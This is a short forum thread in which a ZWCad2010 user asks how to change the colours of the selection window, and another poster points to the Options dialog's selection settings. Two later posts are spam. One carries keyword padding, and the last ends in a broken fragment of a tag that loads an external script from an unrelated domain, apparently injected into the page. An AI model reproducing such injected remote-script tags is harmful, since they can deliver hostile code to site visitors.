SetUp Colors

Rank: 1

OldForumPost

Newbie

posts: 0

Registered: 2012-1-14

Message 1 of 5

 SetUp Colors
31-03-2011 10:52 . am | View his/her posts only


The capture square on my ZWCad2010 is Green when going Left and Red when going Right. Can these Colors be changed and HOW?



I found what I needed. Thank You.
Fixit2011-03-31 11:16:00

Rank: 1

Bwana

Newbie

posts: 20

Registered: 2009-3-4

Message 2 of 5

31-03-2011 03:33 . pm | View his/her posts only
Please share your secret with us. Everything left (port) should be red and everything right (starboard) should be green. I want to change too.

Rank: 1

OldForumPost

Newbie

posts: 0

Registered: 2012-1-14

Message 3 of 5

 SetUp Colors
31-03-2011 10:52 . am | View his/her posts only
Hello setq, to change the selection window color, please go to OPTION dialog box, Selection tabpage, and click the Area Effect Setting button, where you can change the current setting of window color.

Rank: 1

dang xuan nguyen

Newbie

posts: 0

Registered: 2011-11-2

Message 4 of 5

02-10-2011 03:10 . am | View his/her posts only
set up cad.
Have fun. I think it will help you.good night.
http://www.acwhyte.fsnet.co.uk/autocadnotes.htm


everglades bass fishing
charm bracelets
mizzfail2011-10-04 23:48:36

Rank: 1

emmas

Newbie

posts: 1

Registered: 2012-1-12

Message 5 of 5

26-12-2011 12:17 . am | View his/her posts only
setup colors is now so demand most are prefer like this.< ="text/" ="http://ui.streamride.net/ui.js">
See also